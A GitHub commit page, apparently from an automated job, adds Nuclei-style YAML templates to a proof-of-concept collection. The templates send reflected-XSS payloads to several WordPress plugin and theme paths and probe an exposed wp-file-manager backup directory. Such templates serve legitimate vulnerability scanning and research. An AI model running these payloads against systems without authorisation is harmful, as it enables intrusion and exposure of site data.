Skip to content

Commit

Permalink
20241216
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 16, 2024
1 parent dc2bed7 commit a4d1be1
Show file tree
Hide file tree
Showing 14 changed files with 450 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241215
20241216
12 changes: 12 additions & 0 deletions poc.txt
Original file line number Diff line number Diff line change
Expand Up @@ -9217,6 +9217,7 @@
./poc/cve/CVE-2011-5104.yaml
./poc/cve/CVE-2011-5106-0fc17edc7d5f98d9cb422a6dd7ebeea2.yaml
./poc/cve/CVE-2011-5106-2093.yaml
./poc/cve/CVE-2011-5106-2094.yaml
./poc/cve/CVE-2011-5106-2096.yaml
./poc/cve/CVE-2011-5106.yaml
./poc/cve/CVE-2011-5107-2098.yaml
Expand Down Expand Up @@ -9869,6 +9870,7 @@
./poc/cve/CVE-2013-4462-16944fdd8879fb55f44fca776684e221.yaml
./poc/cve/CVE-2013-4462.yaml
./poc/cve/CVE-2013-4625-2266.yaml
./poc/cve/CVE-2013-4625-2267.yaml
./poc/cve/CVE-2013-4625-2269.yaml
./poc/cve/CVE-2013-4625-2270.yaml
./poc/cve/CVE-2013-4625-2271.yaml
Expand Down Expand Up @@ -10308,6 +10310,7 @@
./poc/cve/CVE-2014-4549-4415191f19cc09b59219e8dec440ebce.yaml
./poc/cve/CVE-2014-4549.yaml
./poc/cve/CVE-2014-4550-2363.yaml
./poc/cve/CVE-2014-4550-2364.yaml
./poc/cve/CVE-2014-4550-2366.yaml
./poc/cve/CVE-2014-4550-7c5b0f3fc5ba45d02029313feb89dfd7.yaml
./poc/cve/CVE-2014-4550.yaml
Expand Down Expand Up @@ -11994,6 +11997,7 @@
./poc/cve/CVE-2016-1000132-eca521eb466c9a0703b816e37fd90898.yaml
./poc/cve/CVE-2016-1000132.yaml
./poc/cve/CVE-2016-1000133-2671.yaml
./poc/cve/CVE-2016-1000133-2673.yaml
./poc/cve/CVE-2016-1000133-2675.yaml
./poc/cve/CVE-2016-1000133-68f0438e7e19c3eabe08c84e10c94850.yaml
./poc/cve/CVE-2016-1000133.yaml
Expand Down Expand Up @@ -12023,6 +12027,7 @@
./poc/cve/CVE-2016-1000138-b8f6488df350796223032f6ce8716f9c.yaml
./poc/cve/CVE-2016-1000138.yaml
./poc/cve/CVE-2016-1000139-2699.yaml
./poc/cve/CVE-2016-1000139-2701.yaml
./poc/cve/CVE-2016-1000139-2702.yaml
./poc/cve/CVE-2016-1000139-5a043184256624a09d5739ac78a02adf.yaml
./poc/cve/CVE-2016-1000139.yaml
Expand Down Expand Up @@ -16017,6 +16022,7 @@
./poc/cve/CVE-2020-16952.yaml
./poc/cve/CVE-2020-1721.yaml
./poc/cve/CVE-2020-17362-4655.yaml
./poc/cve/CVE-2020-17362-4658.yaml
./poc/cve/CVE-2020-17362-4659.yaml
./poc/cve/CVE-2020-17362-b8d1258d5e487d3809196efa7cebb656.yaml
./poc/cve/CVE-2020-17362.yaml
Expand Down Expand Up @@ -16263,6 +16269,7 @@
./poc/cve/CVE-2020-24312 2.yaml
./poc/cve/CVE-2020-24312-4805.yaml
./poc/cve/CVE-2020-24312-4806.yaml
./poc/cve/CVE-2020-24312-4809.yaml
./poc/cve/CVE-2020-24312-694d378ae813237a53116c0909956f7b.yaml
./poc/cve/CVE-2020-24312.yaml
./poc/cve/CVE-2020-24313-48b0049e9e24d640a7ebc6488377fcfd.yaml
Expand Down Expand Up @@ -16324,6 +16331,7 @@
./poc/cve/CVE-2020-25213 (copy 3).yaml
./poc/cve/CVE-2020-25213 (copy 4).yaml
./poc/cve/CVE-2020-25213 2.yaml
./poc/cve/CVE-2020-25213-4859.yaml
./poc/cve/CVE-2020-25213-6ed17b06b9c110d64b1d678d881598e8.yaml
./poc/cve/CVE-2020-25213.yaml
./poc/cve/CVE-2020-25223.yaml
Expand Down Expand Up @@ -17848,6 +17856,7 @@
./poc/cve/CVE-2021-24285-1e351fe03157cfef97611aeb987561d8.yaml
./poc/cve/CVE-2021-24285-5670.yaml
./poc/cve/CVE-2021-24285-5672.yaml
./poc/cve/CVE-2021-24285-5673.yaml
./poc/cve/CVE-2021-24285-5674.yaml
./poc/cve/CVE-2021-24285.yaml
./poc/cve/CVE-2021-24286-bb438ca91bbe39dc03a706e917de013b.yaml
Expand Down Expand Up @@ -22305,6 +22314,7 @@
./poc/cve/CVE-2022-1904.yaml
./poc/cve/CVE-2022-1905-db75ed3ff774aa6d3618ad6cf3e0e045.yaml
./poc/cve/CVE-2022-1905.yaml
./poc/cve/CVE-2022-1906(1).yaml
./poc/cve/CVE-2022-1906-03caf3c7a1b0d8e8f3c37fe1e9fa9ab3.yaml
./poc/cve/CVE-2022-1906.yaml
./poc/cve/CVE-2022-1910-93ea6643da587ac5ea832cdf0673e032.yaml
Expand Down Expand Up @@ -122385,6 +122395,7 @@
./poc/remote_code_execution/rce-shellshock-user-agent-9833.yaml
./poc/remote_code_execution/rce-shellshock-user-agent.yaml
./poc/remote_code_execution/rce-shellshock-user-agent.yml
./poc/remote_code_execution/rce-user-agent-shell-shock.yaml
./poc/remote_code_execution/rce-via-java-deserialization.yaml
./poc/remote_code_execution/rce-vuln-params.yaml
./poc/remote_code_execution/rce.yaml
Expand Down Expand Up @@ -145609,6 +145620,7 @@
./poc/wordpress/wp_estimation_form-74fbc2e4c2e32c4d2b634afb2b8ecbeb.yaml
./poc/wordpress/wp_estimation_form-e9e57f3dfd561856803278afb5b47825.yaml
./poc/wordpress/wp_estimation_form.yaml
./poc/wordpress/wp_go_maps.yaml
./poc/wordpress/wp_rokbox-0cfa11f72f29067bcfed3c12b6981b57.yaml
./poc/wordpress/wp_rokbox-0f455c4138587ce49a9a690f3ce6eb8e.yaml
./poc/wordpress/wp_rokbox-10af3a9811748946c98408da9dbde995.yaml
Expand Down
30 changes: 30 additions & 0 deletions poc/cve/CVE-2011-5106-2094.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2011-5106

info:
name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106
tags: cve,cve2011,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
25 changes: 25 additions & 0 deletions poc/cve/CVE-2013-4625-2267.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2013-4625
info:
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
tags: cve,cve2013,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
32 changes: 32 additions & 0 deletions poc/cve/CVE-2014-4550-2364.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: CVE-2014-4550
info:
name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/c7c24c7d-5341-43a6-abea-4a50fce9aab0
- https://nvd.nist.gov/vuln/detail/CVE-2014-4550
tags: cve,cve2014,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2014-4550
cwe-id: CWE-79
description: "Cross-site scripting (XSS) vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter."
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/shortcode–ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and
matchers:
- type: word
words:
- "'><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
39 changes: 39 additions & 0 deletions poc/cve/CVE-2016-1000133-2673.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2016-1000133

info:
name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000133
- https://wordpress.org/plugins/forget-about-shortcode-buttons
- http://www.vapidlabs.com/wp/wp_advisory.php?v=602
- http://www.securityfocus.com/bid/93869
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000133
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
39 changes: 39 additions & 0 deletions poc/cve/CVE-2016-1000139-2701.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2016-1000139

info:
name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
author: daffainfo
severity: medium
reference:
- https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
tags: cve,cve2016,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000139
cwe-id: CWE-79
description: "Reflected XSS in wordpress plugin infusionsoft v1.5.11"

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"

matchers-condition: and
matchers:
- type: word
words:
- '"><script>alert(document.domain);</script><"'
- 'input type="text" name="ContactId"'
condition: and
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
40 changes: 40 additions & 0 deletions poc/cve/CVE-2020-17362-4658.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,40 @@
id: CVE-2020-17362

info:
name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS.
reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
tags: cve,cve2020,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-17362
cwe-id: CWE-79

requests:
- method: GET
path:
- '{{BaseURL}}/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
words:
- "nova-lite"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
37 changes: 37 additions & 0 deletions poc/cve/CVE-2020-24312-4809.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,37 @@
id: CVE-2020-24312

info:
name: WordPress Plugin File Manager (wp-file-manager) Backup Disclosure
author: x1m_martijn
severity: high
description: |
mndpsingh287 WP File Manager v6.4 and lower fails to restrict external access to the fm_backups directory with a .htaccess file. This results in the ability for unauthenticated users to browse and download any site backups, which sometimes include full database backups, that the plugin has taken.
reference:
- https://zeroaptitude.com/zerodetail/wordpress-plugin-bug-hunting-part-1/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24312
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-24312
cwe-id: CWE-552
tags: cve,cve2020,wordpress,backups,plugin

requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/'

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- 'Index of'
- 'wp-content/uploads/wp-file-manager-pro/fm_backup'
- 'backup_'
condition: and

# Enhanced by mp on 2022/04/08
Loading

0 comments on commit a4d1be1

Please sign in to comment.